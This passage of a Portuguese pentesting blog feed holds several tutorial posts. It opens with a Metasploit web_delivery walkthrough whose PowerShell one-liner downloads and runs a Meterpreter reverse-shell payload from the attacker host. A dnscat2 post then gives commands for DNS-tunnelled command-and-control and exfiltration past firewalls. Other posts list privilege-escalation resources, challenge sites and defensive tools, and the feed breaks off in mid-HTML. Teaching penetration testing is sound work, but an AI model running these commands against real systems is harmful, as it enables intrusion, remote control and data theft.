Em primeiro lugar precisamos entrar no msfconsole e digitar os seguintes comandos:</div>
<div style="text-align: justify;">
</div>
<ul>
<li>use exploit/multi/script/web_delivery</li>
<li>set lhost [Kali IP Address]</li>
<li>set lport 4444</li>
</ul>
<div>
Quando digitamos o comando "show targets", vemos as opções de entrega do shell, que em nosso caso será PowerShell:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-ve1PYzfVrms/Vznj1IOCGsI/AAAAAAAADfw/eeQAAmeEWe81h4AxgGd91n38icVso1SQQCLcB/s1600/metasploit-web-delivery-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="https://4.bp.blogspot.com/-ve1PYzfVrms/Vznj1IOCGsI/AAAAAAAADfw/eeQAAmeEWe81h4AxgGd91n38icVso1SQQCLcB/s400/metasploit-web-delivery-2.png" width="400" /></a></div>
<div>
<br /></div>
<div>
Então, para selecionar o tipo de entrega e o shell que será entregue, digitamos os dois seguintes comandos:</div>
<br />
<div>
<ul>
<li style="text-align: justify;">set target 2</li>
<li style="text-align: justify;">set payload windows/meterpreter/reverse_tcp</li>
</ul>
</div>
<div style="text-align: justify;">
E então executamos o comando "exploit", para colocar nossa máquina numa condição de "listening", que é quando fica aguardando alguém conectar-se para entregar o payload:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-YTwAfGV7XNc/VznkenjsBLI/AAAAAAAADf8/UaWVR52HnmI9CI0h_slGKII5b3-DWBsPACLcB/s1600/metasploit-web-delivery-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://1.bp.blogspot.com/-YTwAfGV7XNc/VznkenjsBLI/AAAAAAAADf8/UaWVR52HnmI9CI0h_slGKII5b3-DWBsPACLcB/s400/metasploit-web-delivery-4.png" width="400" /></a></div>
<div>
<br /></div>
<div style="text-align: justify;">
E então, na máquina alvo, onde temos acesso físico, digitamos o comando abaixo para forçar a conexão e a entrega do payload:</div>
<div>
<ul>
<li style="text-align: justify;">powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.39:8080/eAtfMo'))</li>
</ul>
</div>
<div style="text-align: justify;">
E então, na máquina onde temos o Metasploit, veremos uma tentativa de conexão, e uma sessão sendo criada:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-DsJ-j2w8W98/VznlXhePyTI/AAAAAAAADgE/M4sVA70Mc1EbeG1t2pfcdoMiXasU5m3LwCLcB/s1600/metasploit-web-delivery-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://2.bp.blogspot.com/-DsJ-j2w8W98/VznlXhePyTI/AAAAAAAADgE/M4sVA70Mc1EbeG1t2pfcdoMiXasU5m3LwCLcB/s400/metasploit-web-delivery-6.png" width="400" /></a></div>
<div>
<br /></div>
<div style="text-align: justify;">
E então, ou você já terá um shell via meterpreter com o prompt "meterpreter>" aberto, ou simplesmente precisará digitar o comando "sessions -i [numero-da-sessão]" para conectar-se e começar a brincadeira.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A partir daí, terá todo o poder do meterpreter disponível em suas mãos: keylogger, screenshot, ativar webcam para vídeos e fotos, network sniffing, escalada de privilégios, criar backdoor persistente e etc. Quando quiser finalizar a sessão, basta digitar "exit" e cair de novo no msfconsole.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Have some fun!</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-42871490536454238582016-02-18T09:54:00.002-02:002016-09-01T14:46:32.635-03:00Próximo Treinamento: Programação para Pentesters - Junho/2016<span style="font-family: "arial" , "helvetica" , sans-serif;">Novo ano, novo treinamento!</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Esse ano estamos lançando o treinamento Programação para Pentesters, baseado totalmente em Python, que terá sua primeira turma em Junho/2016. Conteúdo resumido pode ser encontrado abaixo, com os principais tópicos abordados:</span><br />
<br />
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Python Scripting – O Essencial</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Programação e Segurança</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Pentest com Python</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Programação para Redes – Sniffers e Packet Injectors</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Manipulação de pacotes e protocolos com Scapy</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Comprometendo a Rede com Scapy</span></li>
<li><span style="font-family: arial, helvetica, sans-serif;">Reconhecimento Web com Python</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Atacando Aplicações</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Compromentendo aplicações Web</span></li>
<li><span style="font-family: arial, helvetica, sans-serif;">Command and Control via GitHub e outros meios</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Usando Tarefas no Windows para comprometer sistemas</span></li>
<li><span style="font-family: arial, helvetica, sans-serif;">Escalada de Privilégios em Windows</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Automatizando Ataques</span></li>
</ul>
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 20.2222px;">O foco principal desse curso é mostrar como a programação usando Python pode facilitar a vida de profissionais de segurança automatizando uma série de atividades, inclusive ataques, que precisam ser feitos periodicamente para avaliações de segurança de seu ambiente.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 20.2222px;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 20.2222px;">Além disso, o aluno aprenderá a não depender exclusivamente de ferramentas de terceiros para realizar seus testes, podendo criar novas ferramentas ou extender as funcionalidades de ferramentas já existentes.</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 20.2222px;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: white; color: #333333; line-height: 20.2222px;">Quem tiver interesse no curso, por favor, acesse o link </span><b style="background-color: white; color: #333333; line-height: 18px; text-align: justify;"><u><a href="http://bit.ly/ZkbwEE" style="color: black; text-decoration: none;">http://bit.ly/ZkbwEE</a></u></b><span style="background-color: white;"><span style="color: #333333;"><span style="line-height: 20.2222px;"> e faça sua inscrição no curso "Programação para Pentesters".</span></span></span></span><br />
<div style="background-color: white; color: #333333; line-height: 20.2222px; text-align: center;">
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b style="background-color: white; color: #333333; line-height: 20.2222px;">Carga horária: mínimo de 32h</b><br style="background-color: white; color: #333333; line-height: 20.2222px;" /><b style="background-color: white; color: #333333; line-height: 20.2222px;">Investimento:</b><span style="background-color: white; color: #333333; line-height: 20.2222px;"> R$ 1.090,00 (com possibilidade de parcelamento em até 3x no cartão de crédito via PayPal ou 12x via BCash)</span><br style="background-color: white; color: #333333; line-height: 20.2222px;" /><b style="background-color: white; color: #333333; line-height: 20.2222px;">Desconto: </b><span style="background-color: white; color: #333333; line-height: 20.2222px;">10% de desconto para pgtos à vista via depósito.</span><br style="background-color: white; color: #333333; line-height: 20.2222px;" /><b style="background-color: white; color: #333333; line-height: 20.2222px;">Horário de aula: </b><span style="background-color: white; color: #333333; line-height: 20.2222px;">22h às 00h</span><br style="background-color: white; color: #333333; line-height: 20.2222px;" /><b style="background-color: white; color: #333333; line-height: 20.2222px;">Dias de aula: </b><span style="background-color: white; color: #333333; line-height: 20.2222px;">terça e quarta-feira.</span><br style="background-color: white; color: #333333; line-height: 20.2222px;" /><b style="background-color: white; color: #333333; line-height: 20.2222px;">Início das aulas: </b><span style="background-color: white; color: #333333; line-height: 20.2222px;">07/06/2016</span></span><br />
<br />
<br />Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com15tag:blogger.com,1999:blog-3466062841868611806.post-9611338837235412562016-02-12T10:49:00.005-02:002016-02-12T10:49:22.984-02:00Bypass de firewall com tunelamento por DNSReferência: https://github.com/iagox86/dnscat2<br />
<br />
<div style="text-align: justify;">
Uma das grandes preocupações de quem administra firewalls é justamente evitar que haja qualquer buraco que possa permitir o comprometimento de sua rede e exfiltração de informações sensíveis através de conexões remotas, principalmente através de aplicações que se utilizam da técnica Command&Control (C2).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Entretanto, sabemos que para o bom funcionamento de qualquer ambiente, alguns serviços e protocolos precisam ser liberados, como é o caso do DNS. O grande problema aqui, é que tanto o DNS, quanto outros protocolos, podem ser utilizados para encapsular informações que as regras de firewall pode deixar passar, por conta de analisarem apenas uma camada específica e apenas parte do payload dos pacotes.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
É importante apenas frisar que o DNS é considerado tanto um protocolo quanto um serviço (referências podem ser encontradas <a href="http://www.ibm.com/developerworks/br/local/opensource/dns_protocol/" target="_blank">aqui</a>). Esse protocolo é nativo da camada de aplicação do modelo OSI, e suas propriedades permitem que protocolos de camadas mais baixas sejam encapsulados em pacotes DNS, o que ajudaria o processo de bypass nas regras de firewalls.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Obviamente, como tudo existe para facilitar nossas vidas, é possível utilizar aplicações já prontas para facilitar todo esse processo, o que facilita a vida tanto de pentesters quanto de atacantes reais.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Bem, implicações éticas à parte, já que somos adultos e sabemos de todas as consequências do uso de tais ferramentas para fins não éticos, vamos ao que é possível fazer com a ferramenta eleita de hoje: o dnscat2.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A primeira coisa que precisamos ter em mente é que essa ferramenta funciona no esquema de cliente/servidor. Portanto, é importante que tenha uma máquina virtual na cloud para servir de local para hospedar o server da ferramenta, como um droplet no Digital Ocean, por exemplo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Após o deployment de sua VM na cloud, basta baixar e instalar o dnscat2 server, com os seguintes comandos:</div>
<div style="text-align: justify;">
<br /></div>
<blockquote class="tr_bq" style="text-align: justify;">
<blockquote class="tr_bq">
# apt-get update</blockquote>
<blockquote class="tr_bq">
# apt-get -y install ruby-dev git make g++</blockquote>
<blockquote class="tr_bq">
# gem install bundler</blockquote>
<blockquote class="tr_bq">
# git clone https://github.com/iagox86/dnscat2.git</blockquote>
<blockquote class="tr_bq">
# cd dnscat2/server</blockquote>
<blockquote class="tr_bq">
# bundle install</blockquote>
</blockquote>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
E após instalar o server, para ativá-lo basta usar o comando abaixo, a partir de dentro do diretório dnscat2/server:</div>
<blockquote class="tr_bq" style="text-align: justify;">
# ruby ./dnscat2.rb</blockquote>
<div style="text-align: justify;">
Com isso feito, basta agora executar o cliente na máquina vítima, ou de sua máquina dentro da rede de onde quer fazer a conexão, usando simplesmente o parâmetro "--host [IP-do-server]". Caso a máquina de onde esteja rodando o cliente seja Windows, basta baixar o binário pré-compilado do site do desenvolvedor: https://downloads.skullsecurity.org/dnscat2/ e executá-lo com o mesmo parâmetro (--host [IP-do-server]).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Assim que o cliente for executado, poderá perceber que no server você receberá o laerta de uma nova conexão existente com um cliente, como abaixo:</div>
<blockquote class="tr_bq" style="text-align: justify;">
<blockquote class="tr_bq">
# ruby ./dnscat2.rb</blockquote>
<blockquote class="tr_bq">
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains = n/a]...</blockquote>
<blockquote class="tr_bq">
No domains were selected, which means this server will only respond to direct queries (using --host and --port on the client)</blockquote>
<blockquote class="tr_bq">
dnscat2> New session established: 1258 </blockquote>
</blockquote>
<blockquote class="tr_bq" style="text-align: justify;">
<blockquote class="tr_bq">
dnscat2></blockquote>
</blockquote>
<div style="text-align: justify;">
O que é mais interessante, é que a partir do server você poderá interagir com o cliente a qualquer momento, executando comandos e carregando aplicações definindo com qual sessão deseja interagir, como por exemplo:</div>
<blockquote class="tr_bq" style="text-align: justify;">
<blockquote class="tr_bq">
dnscat2> session -i 1258</blockquote>
<blockquote class="tr_bq">
Welcome to a command session!</blockquote>
<blockquote class="tr_bq">
Use 'help' for a list of commands or ^z for the main menu</blockquote>
<blockquote class="tr_bq">
dnscat [command: 1258]> exec notepad.exe</blockquote>
<blockquote class="tr_bq">
Sent request to execute</blockquote>
<blockquote class="tr_bq">
dnscat [command: 1258]></blockquote>
</blockquote>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
dnscat2 também suporta outros comandos, como download e upload, para exfiltragem de informações por exemplo.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Outra forma interessante, para tornar nossa estrutura mais robusta, é configurar um servidor DNS em alguma outra droplet (VM na cloud) usando um name específico, como hackproofing.com por exemplo, e configurá-lo para atuar como um servidor de DNS rodando em um IP válido, que servirá de intermediário entre o server e o client. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Sendo assim, precisaremos configurar o server para rodar conectado à esse DNS com o comando:</div>
<blockquote class="tr_bq" style="text-align: justify;">
# ruby ./dnscat2.rb hackproofing.com</blockquote>
<div style="text-align: justify;">
E o client a mesma coisa, mas agora sem o parâmetro --host, simplesmente colocando o nome do DNS "hackproofing.com" após o comando de execução do cliente dnscat2.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Dessa maneira, se executar um wireshark para analisar as requisições saindo da rede local, verá várias requisições feitas ao DNS "hackproofing.com". E obviamente, dependendo da quantidade de tráfego gerado por essas conexões, para um administrador de redes atento, isso chamará sua atenção.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Esse é o básico de utilização da ferramenta! Portanto, divirtam-se e descubram novas funcionalidades e formas de utilizá-la.</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-88812390644687909542016-01-18T13:56:00.001-02:002016-01-18T13:56:13.376-02:00Escalada de Privilégio em Windows e LinuxA segunda principal fase de um teste de invasão, na minha opinião é justamente a pós-exploração, sendo a primeira a fazer de Footprinting/Fingerprinting.<br />
<br />
Enquanto que a maioria dos pentesters se contentam em entregar um simples screenshot com de uma tela preta com um caracter "#" ou um "<span style="color: #454545; font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20.006px;">NT AUTHORITY\SYSTEM</span>", o que realmente vale para o cliente é mostrar o quanto suas informações sensíveis estão expostas. Entretanto isso pressupõe que o pentester realizou o comprometimento de uma estação ou servidor, e aprofundou-se em suas atividades.<br />
<br />
Para conseguir chegar a esse ponto, a primeira coisa é fazer a escalada de privilégios, mas decididamente não parar por aí. E esse post vai falar justamente sobre isso: escalada de privilégios em diferentes sistems operacionais.<br />
<br />
Existem muitas ferramentas que já executam esse procedimento para você, após ter conseguido o acesso inicial através de exploração ou simples acesso físico. Entretanto, nem sempre poderemos contar com as ferramentas prontas, então aqui já seguem cinco listas de comandos a serem usados para escalar privilégios, alterar configurações do S.O. e/ou executar procedimentos que sem os devidos privilégios seria impossível:<br />
<br />
<ul>
<li><b>Linux/Unix/BSD Post Exploitation</b>: <a href="https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US">https://docs.google.com/document/d/1ObQB6hmVvRPCgPTRZM5NMH034VDM-1N-EWPRz2770K4/edit?hl=en_US</a></li>
<li><b>Windows Post Exploitation</b>: <a href="https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US">https://docs.google.com/document/d/1U10isynOpQtrIK6ChuReu-K1WHTJm4fgG3joiuz43rw/edit?hl=en_US</a></li>
<li><b>OSX Post Exploitation:</b> <a href="https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US">https://docs.google.com/document/d/10AUm_zUdAQGgoHNo_eS0SO1K-24VVYnulUD2x3rJD3k/edit?hl=en_US</a></li>
<li><b>Obsucure Syststem’s Post Exploitation</b>: <a href="https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit">https://docs.google.com/document/d/1CIs6O1kMR-bXAT80U6Jficsqm0yR5dKUfUQgwiIKzgc/edit</a></li>
<li><b>Metasploit Post Exploitation</b>: <a href="https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit">https://docs.google.com/document/d/1ZrDJMQkrp_YbU_9Ni9wMNF2m3nIPEA_kekqqqA2Ywto/edit</a></li>
</ul>
<br />
Além dos comandos, ainda assim podemos utilizar alguns scripts que facilitam a vida, ajudando-nos a descobrir brechas na configuração do S.O. que podem ser exploradas para a escalada de privilégios. Temos como exemplo três scripts:<br />
- <b>Linux Local Enumeration</b>: <a href="https://highon.coffee/downloads/linux-local-enum.sh">https://highon.coffee/downloads/linux-local-enum.sh</a><br />
- <b>Unix Privesc Check</b>: <a href="http://pentestmonkey.net/tools/audit/unix-privesc-check">http://pentestmonkey.net/tools/audit/unix-privesc-check</a><br />
- <b>Windows Privesc Check</b>: <a href="https://github.com/pentestmonkey/windows-privesc-check">https://github.com/pentestmonkey/windows-privesc-check</a><br />
<br />
As três ferramentas acima, auxiliam e muito em situações onde precisamos encontrar alguma falha na configuração do sistema explorado, mas não temos tanto tempo para ficar fuçando, então a rapidez com que temos um retorno acaba valendo a pena utilizá-las, ainda mais quando vc tem aceso físico à máquina.<br />
<br />
Então aproveitem essas informações e divirtam-se!Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-33214106108926861922015-12-12T10:27:00.001-02:002015-12-12T10:27:35.197-02:00Sites de desafios para treinarPara não passarmos o sábado em branco, aproveito para postar para vocês alguns links para quem quer se divertir e ainda testar seus conhecimentos na área de segurança.<br />
<br />
Seguem alguns site de desafios:<br />
<br />
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://www.wechall.net/challs/" style="color: #1155cc;" target="_blank">http://www.wechall.net/challs/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://smashthestack.org/" style="color: #1155cc;" target="_blank">http://smashthestack.org/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://www.hacking-lab.com/" style="color: #1155cc;" target="_blank">http://www.hacking-lab.com</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://overthewire.org/wargames/" style="color: #1155cc;" target="_blank">http://overthewire.org/<wbr></wbr>wargames/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://securityoverride.org/challenges/" style="color: #1155cc;" target="_blank">http://securityoverride.org/<wbr></wbr>challenges/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://canyouhack.it/" style="color: #1155cc;" target="_blank">http://canyouhack.it/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://www.trythis0ne.com/" style="color: #1155cc;" target="_blank">http://www.trythis0ne.com/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="https://exploit-exercises.com/" style="color: #1155cc;" target="_blank">https://exploit-exercises.com/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="http://www.hackthissite.org/" style="color: #1155cc;" target="_blank">http://www.hackthissite.org/</a></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<a href="https://www.hellboundhackers.org/articles/index.php" style="color: #1155cc;" target="_blank">https://www.hellboundhackers.<wbr></wbr>org/articles/index.php</a> (olhe o menu esquerdo em "Challenges")</div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
<br /></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8px;">
Divirtam-se e aproveitem para estudar cada vez mais!</div>
Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com0tag:blogger.com,1999:blog-3466062841868611806.post-50972384932979018672015-12-08T18:51:00.003-02:002015-12-08T18:51:49.533-02:00Busca automatizada por Leaks - Encontre informações que vazaram na InternetUma das coisas interessantes que precisamos fazer quando atuamos com segurança da informação, pesquisa de vulnerabilidades, engenharia social, OSINT (Open Source Intelligence), threat intelligence e etc, é justamente a busca por informações importantes. E como estamos na era da informação, e informação vale dinheiro, obviamente que uem tem acesso aà informação em primeiro lugar tem a dianteira em diversos assuntos.<br />
<br />
Para isso, é necessário monitoramento contínuo e atento. Por exemplo, se você cuida da segurança do ambiente de alguns clientes e repentinamente vaza na internet dados sigilosos do mesmo, incluindo informações de contas de usuários. O que aconteceria se você só soubesse disso depois que seu cliente se deparasse com essas informações na internet e ligasse para avisá-lo? Convenhamos que não é um cenário interessante...<br />
<br />
Portanto, nesse post vamos falar de uma ferramenta que pode nos ajudar a descobrir "information leak" antes da coisa se espalhar como rastilho de pólvora e você ter mais tempo para executar uma ação mitigadora. A ferramente é o Scumblr.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://c2.staticflickr.com/6/5631/22714328925_4c64680b93.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="190" src="https://c2.staticflickr.com/6/5631/22714328925_4c64680b93.jpg" width="400" /></a></div>
<br />
<br />
Nessa ferramenta, podemos definir de forma personalizada que tipo de informação queremos monitorar na internet periodicamente, e isso pode abranger os seguintes tipos de leak:<br />
<br />
<br />
<ul>
<li>Credenciais comprometidas</li>
<li>Vulnerabilidades</li>
<li>Conversas de grupos de crackers</li>
<li>Discussões sobre ataques</li>
<li>Discussões relevantes sobre segurança em redes sociais</li>
</ul>
<br />
<br />
E para tanto, Scumblr utiliza-se de várias bases de informações disponíveis na internet que possibilitam a busca manual, mas que sem a ferramenta daria muito trabalho. Algumas dessas fontes estão descritas abaixo:<br />
<br />
<br />
<ul>
<li>Google</li>
<li>YouTube</li>
<li>Facebook</li>
<li>Apple AppStore</li>
<li>Google Play Store</li>
<li>eBay</li>
<li>Twitter</li>
</ul>
<br />
E uma das features que acho interessante no Scumblr é que depois de encontrar resultados, você pode configurar que os tópicos sejam simplesmente marcados como "Reviwed", enviem alertas, ou executem ações automatizadas mais complexas.<br />
<br />
Para quem quiser conhecer um pouco da ferramenta, <a href="https://github.com/Netflix/scumblr" target="_blank">acesse aqui e divirta-se</a>!<br />
<br />
E para finalizar, <a href="https://github.com/Netflix/Scumblr/wiki" target="_blank">acesse a wiki </a>para aprender a configurar e utilizar a ferramenta.Luiz Vieira .'.http://www.blogger.com/profile/01939912130155752340noreply@blogger.com2tag:blogger.com,1999:blog-3466062841868611806.post-91831588850169831532015-12-04T18:40:00.001-02:002015-12-04T18:40:36.363-02:00Análise diferencial de memória para análise de malwares - DAMM<div style="text-align: justify;">
DAMM – Differential Analysis of Malware in Memory</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Esse é o nome da ferramenta que pode agilizar e muito o processo de análise dinâmica e comportamental de um malware em uma máquina real (usada para esse fim) ou virtual.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A ferramenta foi desenvolvida em cima do Volatility, que é outra excelente ferramenta para análise de memória física, e conta com os plugins desse último além de seus próprios plugins.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
DAMM funciona basicamente comparando pedaços da memória infectada, com pedaços de memória de uma máquina não infectada (obviamente ambas as máquinas precisam ter as mesmas configurações e caracaterísticas), e assim vai listando tudo aquilo que for detectado de diferente, como: DLLs, processos sendo executados, arquivos ocultos e etc.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Abaixo podemos ver algo do help dessa ferramenta:</div>
<div style="text-align: justify;">
<br /></div>
<blockquote class="tr_bq" style="text-align: justify;">
<div class="crayon-line" id="crayon-5661f791a9922714708817-1" style="background: 0px 50% rgb(253, 253, 253); border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-e" style="background: transparent; border: 0px; color: rgb(0 , 78 , 208); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">python </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">damm</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">py</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">h</span></div>
<div class="crayon-line crayon-striped-line" id="crayon-5661f791a9922714708817-2" style="background: rgb(247, 247, 247) !important; border: 0px; font-family: Monaco, MonacoRegular, 'Courier New', monospace; font-size: 12px; height: inherit; line-height: 18px; margin: 0px; outline: 0px; padding: 0px 5px; text-align: left; vertical-align: baseline; white-space: pre;">
<span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">usage</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">:</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">damm</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">.</span><span class="crayon-i" style="background: transparent; border: 0px; font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">py</span><span class="crayon-h" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[</span><span class="crayon-o" style="background: transparent; border: 0px; color: rgb(0 , 111 , 224); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">-</span><span class="crayon-v" style="background: transparent; border: 0px; color: rgb(0 , 45 , 122); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">h</span><span class="crayon-sy" style="background: transparent; border: 0px; color: rgb(51 , 51 , 51); font-family: inherit; font-size: inherit !important; font-weight: inherit !important; height: inherit; line-height: inherit !important; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">]</span><span class="crayon-h" style="background: transparent; border: 0px; color: 